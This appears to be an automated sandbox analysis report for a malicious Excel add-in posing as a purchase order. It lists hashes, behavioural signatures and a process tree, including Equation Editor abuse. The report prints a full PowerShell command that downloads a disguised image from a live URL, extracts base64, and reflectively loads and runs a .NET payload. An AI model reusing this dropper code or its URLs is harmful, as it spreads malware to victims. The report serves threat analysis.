Analysis

  • max time kernel
    60s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system
  • submitted
    21/08/2024, 17:50

General

  • Target

    Orden de Compra No. 565344657.xlam

  • Size

    671KB

  • MD5

    2e0db534d6635faac395d4cd17246bc6

  • SHA1

    d5c7b7f9f8e437f9ad43cc125c9db97d388e298b

  • SHA256

    938d1b0a5ac7ece316f0f0ed5cd8617e0d355248263434a9f48dac95f6c1b14f

  • SHA512

    f050585b8d2a16371f7b7ce4aa18829f57b3a8ea7b7f98862bf854305290af5cafe589e0fc1adaf760c2d5d2af68cd44c85728f90d6b5df540456615f6495ed4

  • SSDEEP

    12288:n/PzpHMrabWFSWHk+SQGEY9A+qxu0c6xBS/Bo0xGXtnOQhyt2UiabtprVC:3zBwFSeX1G0+qiaBwo6GXQQhy04rQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell and hides the display window.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Orden de Compra No. 565344657.xlam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:848
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\equitosxxmenacegirlfriend.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⫣ ∨ ☦ ⧳ ⇷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4446sabsotiuqe/641.922.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2624

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    2b4e8ca71d2170751fb7b1cf88dd7c39

    SHA1

    4cd05c8333b5ec03f439b39cd972a6b7f71562ed

    SHA256

    6036060404b77ed19f5c481d500a5c7e0ded30403287464e8b9f2450d323ae3a

    SHA512

    d28afbbcaf6885946136facbb6e889dc20895a5df227932e925752d2d944d5ded7525d78b83896c711d71acda0da85271901141e50230ed824c8a2dc70dcb373

  • C:\Users\Admin\AppData\Roaming\equitosxxmenacegirlfriend.vbs

    Filesize

    703KB

    MD5

    2315bcb53ea540318897164afb4c7845

    SHA1

    dbeb67bc40212c16971a0611884b4aa9ac297488

    SHA256

    aa61b5de1809b37b5d3d2a841195e16b79f31ac0416c5cfe73aab8a717449889

    SHA512

    4853936b368ff7183031ccc83c6eef84c9ed6daed734dd62959b04a7b63ab6071b9bfd8575617f93669f83d9042d09f63bd9e4313c3178b945bc144b7d0b2b1b

  • memory/848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/848-1-0x00000000724AD000-0x00000000724B8000-memory.dmp

    Filesize

    44KB

  • memory/848-16-0x00000000724AD000-0x00000000724B8000-memory.dmp

    Filesize

    44KB